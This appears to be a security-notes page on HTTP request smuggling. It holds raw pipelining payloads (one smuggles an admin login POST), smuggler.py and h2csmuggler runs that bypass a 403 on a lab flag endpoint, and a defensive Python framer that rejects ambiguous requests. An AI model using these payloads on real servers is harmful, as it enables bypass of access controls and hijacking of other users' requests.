Request Smuggling

When a forward proxy sits in front of two different backends, it may be possible to chunk a single request just right so that it is split into two separate requests that are sent to different backends.

Use the Burp Plugin

More Examples:
- https://medium.com/@StealthyBugs/2c43e81bcc52

Payloads

https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
Example python Pipelining code

Simple Pipelining Example:

GET /sum.jsp?a=1&b=1&c=2&d=2 HTTP/1.0
Host: example.com:8080
Connection: keep-alive

POST /sum.jsp?a=5&b=5 HTTP/1.1
Host: example.com:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

c=6&d=6

Combined Pipelining Example:

POST /sum.jsp?a=5&b=5 HTTP/1.1
Host: example.com:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

c=2&d=2GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0
Host: example.com:8080
Connection: keep-alive

GET with Content-Length Pipelining Example:

GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0
Host: example.com:8080
Content-Length: 10

1234567890POST /sum.jsp?a=5&b=5 %0DContent-Type: application/x-www-form-urlencoded
Host: example.com:8080
Content-Length: 30

user=admin&password=abc123
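The splitter below is an added example (not code from the original notes or from the linked slides): a strict Content-Length framer of the kind a front-end should run before forwarding, shown against the Combined Pipelining Example above. It frames that stream as two requests, leaves the GET-with-Content-Length example waiting because its Content-Length exceeds the body, and rejects the framing a desync relies on: Transfer-Encoding next to Content-Length, conflicting Content-Length values, and field lines with no colon or with whitespace in the name (the variations the smuggler mutations probe). `split_pipeline`, `AmbiguousFraming` and `COMBINED` are names chosen here; chunked decoding is out of scope.

```python
import re

CRLF = b"\r\n"
TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")  # RFC 7230 tchar, no whitespace

class AmbiguousFraming(ValueError):
    """Framing that two HTTP parsers in a chain could read differently."""

def _headers(block):
    lines = block.split(CRLF)
    hdrs = []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon or not TOKEN.match(name):  # no colon, or space/tab in the name
            raise AmbiguousFraming("malformed header line: %r" % line)
        hdrs.append((name.decode().lower(), value.strip().decode()))
    return lines[0].decode(), hdrs

def _body_length(hdrs):
    cl = {v for k, v in hdrs if k == "content-length"}
    te = [v for k, v in hdrs if k == "transfer-encoding"]
    if te:  # TE next to CL is the CL.TE/TE.CL precondition; chunked is out of scope here
        raise AmbiguousFraming("Transfer-Encoding present (Content-Length: %r)" % cl)
    if len(cl) > 1:
        raise AmbiguousFraming("conflicting Content-Length values: %r" % cl)
    value = cl.pop() if cl else "0"
    if not value.isdigit():
        raise AmbiguousFraming("non-numeric Content-Length: %r" % value)
    return int(value)

def split_pipeline(stream):
    """Split a raw byte stream into (request_line, headers, body) tuples; returns
    them plus any trailing bytes that do not yet form a complete request."""
    requests = []
    while stream:
        end = stream.find(CRLF + CRLF)
        if end < 0:
            break
        req_line, hdrs = _headers(stream[:end])
        start, n = end + 4, _body_length(hdrs)
        if len(stream) - start < n:
            break  # body shorter than Content-Length: a real server keeps waiting
        requests.append((req_line, hdrs, stream[start:start + n]))
        stream = stream[start + n:]
    return requests, stream

# Constructed sample: the page's "Combined Pipelining Example" as one byte stream
COMBINED = (b"POST /sum.jsp?a=5&b=5 HTTP/1.1\r\nHost: example.com:8080\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 7\r\n\r\n"
            b"c=2&d=2GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0\r\nHost: example.com:8080\r\nConnection: keep-alive\r\n\r\n")
```

Feeding the GET-with-Content-Length example to `split_pipeline` returns no requests and the whole stream as the remainder, which is exactly the hang that makes a short Content-Length useful for timing-based detection.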

HTTP Smuggling

Smuggler Script

Example:

python smuggler.py -u 'https://postman-echo.com/post?foo1=bar1&foo2=bar2'

     @defparam                         v1.1

[+] URL        : https://postman-echo.com/post?foo1=bar1&foo2=bar2
[+] Method     : POST
[+] Endpoint   : /post?foo1=bar1&foo2=bar2
[+] Configfile : default.py
[+] Timeout    : 5.0 seconds
[+] Cookies    : 1 (Appending to the attack)

Hitting other services

https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142

WebSocket Smuggling

https://github.com/0ang3el/websocket-smuggle

HTTP/2 Request Smuggling

https://blog.assetnote.io/2021/03/18/h2c-smuggling/
https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c

Initial Request to Endpoints:

>>> curl -ik https://localhost:8001/flag
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

H2C Script:

>>> /h2csmuggler.py -x https://localhost:8001 http://backend/flag
[INFO] h2c stream established successfully.
:status: 200
content-type: text/plain; charset=utf-8
content-length: 20
date: Mon, 05 Apr 2021 18:04:54 GMT

Hello, /, http: true

[INFO] Requesting - /flag
:status: 200
content-type: text/plain; charset=utf-8
content-length: 17
date: Mon, 05 Apr 2021 18:04:54 GMT

You got the flag!

SMTP Smuggling

https://www.redpacketsecurity.com/smtp-smuggling-new-flaw-lets-attackers-bypass-security-and-spoof-emails/